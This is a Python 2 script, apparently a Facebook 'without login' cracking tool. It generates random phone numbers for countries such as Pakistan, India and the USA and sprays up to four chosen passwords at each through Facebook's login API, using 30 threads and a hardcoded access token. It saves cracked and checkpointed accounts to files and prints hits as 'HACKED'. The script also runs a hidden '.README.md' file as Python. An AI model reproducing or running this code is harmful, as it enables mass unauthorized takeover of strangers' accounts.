# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(40000):
    nmbr = random.randint(1111111, 9999999)
    sys.stdout = open('.txt', 'a')
    print nmbr
    sys.stdout.flush()

try:
    import requests
except ImportError:
    os.system('pip2 install requests')

try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')
    time.sleep(1)
    os.system('python2 .README.md')

from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('user-agent', 'Mozilla/5.0 (Linux; Android 7.0; BAH-W09 Build/HUAWEIBAH-W09; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/63.0.3239.111 Safari/537.36 [FB_IAB/FB4A;FBAV/154.0.0.29.385;]')]
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
br.addheaders = [('user-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0; KTXN B661094629A90240T1390849P1) like Gecko')]
br.addheaders = [('user-agent', 'Mozilla/5.0 (Linux; Android 8.0.0; STF-L09 Build/HUAWEISTF-L09; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/169.0.0.46.94;]')]
br.addheaders = [('user-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0; KTXN B667897245A77460T1297416P1) like Gecko')]
br.addheaders = [('user-agent', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J106H Build/MMB29Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/64.0.3282.137 Mobile Safari/537.36 SamsungBrowser/CrossApp/0.1.90')]
br.addheaders = [('user-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0; KTXN B673272004A48129T1390849P1) like Gecko')]
br.addheaders = [('user-agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 Mailbird/2.5.8.0/ Mailbird/2.5.8.0/')]
br.addheaders = [('user-agent', 'Millennium/20180228 CFNetwork/811.4.18 Darwin/16.5.0')]
br.addheaders = [('user-agent', 'Mozilla/5.0 (Linux; Android 7.0; VFD 610 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/162.0.0.45.94;]')]
br.addheaders = [('user-agent', 'Mozilla/5.0 (Linux; Android 5.0.2; VF-1497 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Safari/537.36')]
br.addheaders = [('user-agent', 'Mozilla/5.0 (Linux; Android 7.0; BAH-W09 Build/HUAWEIBAH-W09; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/63.0.3239.111 Safari/537.36 [FB_IAB/FB4A;FBAV/154.0.0.29.385;]')]

def exb():
    print '[!] Exit Successfully'
    os.sys.exit()


def exxb():
    print '[!] \x1b[1;91mTHIS OPTION NOT AVAILABLE AT THE MOMENT.BUT \x1b[3;92;40m COM\x1b[1;95mING SO\x1b[1;97mON \x1b[1;91m\x1b[0;34;40m'
    os.sys.exit()


def psb(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)


def jalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(3.0 / 200)


def tik():
    titik = [
     '   ', '.  ', '.. ', '...', '.. ', '.  ', '   ']
    for o in titik:
        print '\r\x1b[1;91m     [\xe2\x97\x8f] \x1b[1;92mLoa\x1b[1;90mding \x1b[1;97m' + o,
        sys.stdout.flush()
        time.sleep(0.5)


def jaalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(2.0 / 9900)


def t():
    time.sleep(1)


def cb():
    os.system('clear')


back = 0
successful = []
cpb = []
oks = []
id = []
##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def login():
    os.system('clear')
    os.system('toilet -f big \\S O  M I/ -F gay')
    print " \033[1;96m  ╔═══════════════╗"
    print "\033[1;96m   |\033[1;97mWITHOUT LOGIN \033[1;96m |"
    print " \033[1;96m  ╚═══════════════╝"
    print"\033[1;92m1.\033[1;97m├\033[1;93m PAKISTAN WITHOUT LOGIN"
    print"\033[1;92m2.\033[1;97m├\033[1;93m INDIA WITHOUT LOGIN"
    print"\033[1;92m3.\033[1;97m├\033[1;93m USA WITHOUT LOGIN"
    print"\033[1;92m4.\033[1;97m├\033[1;93m SAUDIA WITHOUT LOGIN"
    print"\033[1;92m5.\033[1;97m├\033[1;93m INDONESIA WITHOUT LOGIN"
    print"\033[1;92m6.\033[1;97m├\033[1;93m BRAZIL WITHOUT LOGIN"
    print"\033[1;92m7.\033[1;97m├\033[1;93m CHINA WITHOUT LOGIN"
    print"\033[1;92m8.\033[1;97m├\033[1;93m SPAIN WITHOUT LOGIN"
    print"\033[1;92m9.\033[1;97m├\033[1;93m POLAND WITHOUT LOGIN"
    print"\033[1;92m10.\033[1;97m├\033[1;93m U-A-E WITHOUT LOGIN"
    pilih_login()

def pilih_login():
    bch = raw_input('\n\n \x1b[1;96m>   ')
    if bch == '':
        print '[!] Fill in correctly'
        pilih_login()
    elif bch == '1':
        os.system('clear')
        os.system('toilet -f big pakistan -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 00 to 09")
        jalan("\033[1;95m[+] 11 to 18")
        jalan("\033[1;95m[+] 21 to 24")
        jalan("\033[1;95m[+] 30 to 36")
        jalan("\033[1;95m[+] 40 to 49")
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+923"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
 
    elif bch == '2':
        tik()
        os.system('clear')
        os.system('toilet -f big india -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 905,975,755,855,")
        jalan("\033[1;95m[+] 954,897,967,937")
        jalan("\033[1;95m[+] 700,727,965,786,")
        jalan("\033[1;95m[+] 874,856,566,590 ")
        jalan("\033[1;95m[+] 527,568, 578")
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+91"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '3':
        tik()
        os.system('clear')
        os.system('toilet -f big U S A-F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 555,786, 815, 315, 256, ")
        jalan("\033[1;95m[+] 401, 718, 917, 202, 701,")
        jalan("\033[1;95m[+] 303, 703, 803, 999, 708,")
        jalan("\033[1;95m[+] 559, 310, 809, 551")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+1"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '4':
        tik()
        os.system('clear')
        os.system('toilet -f big Saudia -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 50,51,52")
        jalan("\033[1;95m[+] 53,54,55")
        jalan("\033[1;95m[+] 56,57,58")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+966"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '5':
        tik()
        os.system('clear')
        os.system('toilet -f big Indonesia -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 786,815,315,256,401")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+1"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '6':
        tik()
        os.system('clear')
        os.system('toilet -f big  Brazil -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 127, 179, 117, 853, 318")
        jalan("\033[1;95m[+]  219, 834, 186, 479, 113")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+55"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '7':
        tik()
        os.system('clear')
        os.system('toilet -f big China -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 1355,")
        jalan("\033[1;95m[+] 1555")
        jalan("\033[1;95m[+] 1855")
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+86"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '8':
        tik()
        os.system('clear')
        os.system('toilet -f big Spain -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 655,755,60, 76, 73, 64, ")
        jalan("\033[1;95m[+] 69, 77, 65, 61, 75, 68")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+34"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '9':
        tik()
        os.system('clear')
        os.system('toilet -f big Poland -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 72, 67, 53, 51")
        jalan("\033[1;95m[+] 66, 69, 78, 79, 60")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+48"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif bch == '10':
        tik()
        os.system('clear')
        os.system('toilet -f big U-A-E -F gay')
		
        jalan("\033[1;93m[+]⌵ Choose the number ⌵")
        jalan("\033[1;95m[+] 50,55,58,54,56")
        
        try:
            c = raw_input('\033[1;93mCODE\033[1;96m: >>> ')
            k = "+971"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    else:
        print '[!] WARNING STAR BOY'
        action()


    somi = raw_input('\x1b[1;97m Type Any Password No1: ')
    somii = raw_input('\x1b[1;97m Type Any Password No2: ')
    somiii = raw_input('\x1b[1;97m Type Any Password No3: ')
    somiiii = raw_input('\x1b[1;97m Type Any Password No4: ')
    jalan("\033[1;93m⊰═════════════════════════════════════════════⊱")
    jalan("\033[1;91m\033[1;33m             │\033[1;92m TOUR TOUCH SKY \033[1;93m│          \033[1;0m")
    jalan("\033[1;93m⊰═════════════════════════════════════════════⊱")
    print

    def main(arg):
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass

        try:
            pass1 = somi
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n'
                okb = open('save/successfull.txt', 'a')
                okb.write(k + c + user + '|' + pass1 + '\n')
                okb.close()
                oks.append(c + user + pass1)
            elif 'www.facebook.com' in q['error_msg']:
                print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n'
                cps = open('save/checkpoint.txt', 'a')
                cps.write(k + c + user + '|' + pass1 + '\n')
                cps.close()
                cpb.append(c + user + pass1)
            else:
                pass2 =  somii
                data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                q = json.load(data)
                if 'access_token' in q:
                    print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n'
                    okb = open('save/successfull.txt', 'a')
                    okb.write(k + c + user + '|' + pass2 + '\n')
                    okb.close()
                    oks.append(c + user + pass2)
                elif 'www.facebook.com' in q['error_msg']:
                    print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n'
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k + c + user + '|' + pass2 + '\n')
                    cps.close()
                    cpb.append(c + user + pass2)
                else:
                    pass3 =  somiii
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' + '\n'
                        okb = open('save/successfull.txt', 'a')
                        okb.write(k + c + user + '|' + pass3 + '\n')
                        okb.close()
                        oks.append(c + user + pass3)
                    elif 'www.facebook.com' in q['error_msg']:
                        print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n'
                        cps = open('save/checkpoint.txt', 'a')
                        cps.write(k + c + user + '|' + pass3 + '\n')
                        cps.close()
                        cpb.append(c + user + pass3)
                    else:
                        pass4 =  somiiii
                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                        q = json.load(data)
                        if 'access_token' in q:
                            print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n' + '\n'
                            okb = open('save/successfull.txt', 'a')
                            okb.write(k + c + user + '|' + pass4 + '\n')
                            okb.close()
                            oks.append(c + user + pass4)
                        elif 'www.facebook.com' in q['error_msg']:
                            print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n'
                            cps = open('save/checkpoint.txt', 'a')
                            cps.write(k + c + user + '|' + pass4 + '\n')
                            cps.close()
                            cpb.append(c + user + pass4)
                            
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print 50 * '-'
    print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
    print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
    print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
    raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
    os.system('python2 .README.md')


if __name__ == '__main__':
    login()
